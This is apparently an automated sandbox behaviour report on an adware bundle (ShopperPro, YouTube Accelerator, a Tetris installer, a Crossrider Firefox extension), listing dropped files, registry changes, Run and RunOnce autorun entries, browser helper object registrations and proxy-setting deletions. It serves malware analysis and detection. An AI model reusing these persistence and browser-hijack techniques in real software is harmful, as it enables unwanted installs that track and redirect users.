C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\288.js (969 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\d15996a3e1873333557cc0c6c849bb01.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\crossrider_statusbar.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\246.js (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\200.js (813 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\install.rdf (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\63b22631a526419ea26680c080bbac8c.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\1cecc7e218873c28f4b662759216ae67.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\64.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\5dbb92ae30bf904cf707a60753ebfcab.js (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\36f446706cbe822655d64f2059682958.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\9c4474f9cc2ba1852dc46219428a5529.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\177.js (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\78.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\1.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\390.js (829 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\update.css (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\cd968bf84d67abd38d7e0e082cf3ddf4.js (964 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\182.js (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\3331ce3124f425f18aa0cd3f4ebe2a70.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon16.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\browser.xul (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\334.js (973 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\6d5fc3cb52b115abdd8a361b3100b092.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\7e879a8ffcf48cf936a306241728a0e3.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\281.js (461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\userCode\extension.js (617 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\c27d5a4158dc01e3abffc659fce6398a.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\220.js (1592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\options.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\563fc8d160446dffd6f83bfad55d207e.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\e1502e0951b2a47afbfc8872f49c1b06.js (618 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\7ae0b639df0fc9c2612f306f59e1c78f.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\180.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\356.js (413 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\195.js (414 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\399.js (525 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\e51cfc6d25a631d86877ff61fa2c7780.js (659 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\13.js (14 bytes)

The process taskeng.exe:3412 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Program Files% (x86)\ShopperPro\JSDriver\1.42.0.1766\jsdrv.exe (291 bytes)

The process ytaiesmt_smtyc_setup.exe:2128 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4866.tmp (35697 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\4D90EAE405E9E2FF (34773 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\NK.lky (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\DCytaiesmt_smtyc_setup.exe (379403 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\D1989.dll (30 bytes)

The process cbead634babe14801c0b14d3517a10f8.tmp:2428 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Program Files% (x86)\The Tetris Game\www.TheTetrisGame.com.url (54 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Tetris Game\More Games on the Web.lnk (924 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UKE9O.tmp\_isetup\_setup64.tmp (6 bytes)
%Program Files% (x86)\The Tetris Game\unins000.dat (31262 bytes)
C:\Users\"%CurrentUserName%"\Desktop\More games.lnk (906 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UKE9O.tmp\bi.exe (4701 bytes)
%Program Files% (x86)\The Tetris Game\Tetris.exe (1 bytes)
%Program Files% (x86)\The Tetris Game\is-SBKRK.tmp (7385 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UKE9O.tmp\itdownload.dll (1489 bytes)
%Program Files% (x86)\The Tetris Game\is-CVF0M.tmp (25913 bytes)
C:\Users\"%CurrentUserName%"\Desktop\The Tetris Game.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Games.url (54 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UKE9O.tmp\innocallback.dll (130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UKE9O.tmp\_isetup\_shfoldr.dll (47 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Tetris Game\The Tetris Game.lnk (1 bytes)

The process INS_IWEBAR.EXE:3836 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC5FD.tmp\rblyvufer.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC5FD.tmp\Mniitruxnlcp.exe (1594703 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC5FD.tmp\aexyni.dll (2141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC5FD.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC5FD.tmp\wwrumuo.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC5FD.tmp\Sbmxxpvhefaej.tmp (360192 bytes)

Registry activity

The process ProtectService.exe:4372 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 5E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Wow6432Node\IHProtect]
"ptid" = "smt"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"

The process ProtectService.exe:4436 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
"AutoConfigURL"
"ProxyServer"

The process YTAHelper.exe:3196 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"UserId" = "%%PIXGUID(aff=smtyc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}" = "Type: REG_SZ, Length: 0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "31 F3 1C 5E 30 7A D0 01"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID]
"{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}]
"(Default)" = "YTAHelperBHO"
"NoExplore" = "1"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"CONFIGLOCATION" = "C:\ProgramData\YTAHelper"
"Version" = "1.5.4.199"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"Aff" = "Type: REG_SZ, Length: 0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator\ExtraInfo]
"DBVersion" = "1.0.0.1"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"DBLocation" = "C:\ProgramData\YTAHelper"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process install20087.exe:1292 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "2D 85 33 3A 90 73 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 49 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

"WpadDecisionTime" = "7E D3 27 51 30 7A D0 01"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce]
"thetetrisgame" = ""

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process ShopperPro.exe:3536 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Wow6432Node\ShopperPro]
"UserId" = "83ab0c3e-99df-4098-86d9-ef1552a86f5e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"NoExplore" = "1"

[HKLM\SOFTWARE\ShopperPro]
"CONFIGLOCATION" = "C:\ProgramData\ShopperPro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Wow6432Node\ShopperPro]
"Aff" = "smtyc"

[HKLM\SOFTWARE\ShopperPro]
"DBLocation" = "C:\ProgramData\ShopperPro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionTime" = "0A 31 20 61 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "31 F3 1C 5E 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Wow6432Node\ShopperPro]
"ExeLocation" = "%Program Files% (x86)\ShopperPro"
"Version" = "3.1.9318.1766"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKLM\SOFTWARE\Wow6432Node\ShopperPro]
"DBLocation" = "C:\ProgramData\ShopperPro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Wow6432Node\ShopperPro]
"CONFIGLOCATION" = "C:\ProgramData\ShopperPro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKLM\SOFTWARE\Wow6432Node\ShopperPro]
"ChromeExtFile" = "ShopperPro.crx"
"ChromeExtID" = "ojhagnahfpegocdhlopgljpaafeogmcc"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Wow6432Node\ShopperPro]
"DriverVersion" = "1.42.0.1766"

[HKLM\SOFTWARE\Wow6432Node\ShopperPro\ExtraInfo]
"DBVersion" = "1.0.1.4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"SPDriver" = "%Program Files% (x86)\ShopperPro\JSDriver\1.42.0.1766\jsdrv.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SPDriver" = "%Program Files% (x86)\ShopperPro\JSDriver\1.42.0.1766\jsdrv.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process ProtectWindowsManager.exe:5076 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
"AutoConfigURL"
"ProxyServer"

The process ProtectWindowsManager.exe:5024 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\eventlog\Application\WindowsMangerProtect]
"EventMessageFile" = "C:\ProgramData\WindowsMangerPro￿¡"
"TypesSupported" = "7"

The process YouTubeAcceleratorService.exe:3544 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{I3B3ED09D712B0615}" = "04 00 00 00"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 7B A4 44 A3"
"{K7C0DB872A3F777C0}" = "6D F6 81 44 40 17 1F 46 74 E8 01 64 22 18 AF B6"

The process YouTubeAcceleratorService.exe:3848 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\fSXewhkfv]
"(Default)" = "_xYZQ}JbXMHpbpODr"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Goobzo\YouTube Accelerator\AdditionalInfo]
"VA_Aff" = "NONE"

[HKU\.DEFAULT\Software\GOOBZO\YouTube Accelerator]
"LastUpdateTime" = "1429400139"

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 7B A4 44 A3"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"LSPTestSucceeded" = "1"

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{I3B3ED09D712B0615}" = "09 00 00 00"

[HKCU\Software\Goobzo\YouTube Accelerator\AdditionalInfo]
"XMLVersion" = "0"
"XMLUpdateFailed" = "0"

[HKCU\Software\Goobzo\YouTube Accelerator]
"SBPPW" = "KsVYfLGi"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\uqmpybcjdI]
"(Default)" = "K|KyRWolh|ab@_w}Yu`gBISI`@Ndl"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Tracer]
"TraceFolder" = "C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\"

[HKCU\Software\Goobzo\YouTube Accelerator\AdditionalInfo]
"UpdateReason" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "ED 20 12 5F 30 7A D0 01"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionTime" = "ED 20 12 5F 30 7A D0 01"
"WpadDecisionReason" = "1"

[HKCU\Software\Goobzo\YouTube Accelerator]
"SBAIDV" = "0"
"SBPIDV" = "0"
"SBAPW" = "l6G2E4Yn"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Tracer]
"TimeLimit" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\sehlsRMuplph]
"(Default)" = "}QJijLDlnGtvlM\Dt`mRLXE[tLli@u"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"LspVersion" = "1.0.0.1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Tracer]
"TraceLevel" = "3"

[HKCU\Software\Goobzo\YouTube Accelerator\AdditionalInfo]
"resver" = "1.0.0.8"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\cgcdxuSksc]
"(Default)" = "mA_vX[@|ipql`LRKtAe^~Eu"

[HKLM\SOFTWARE\Wow6432Node\Licenses]
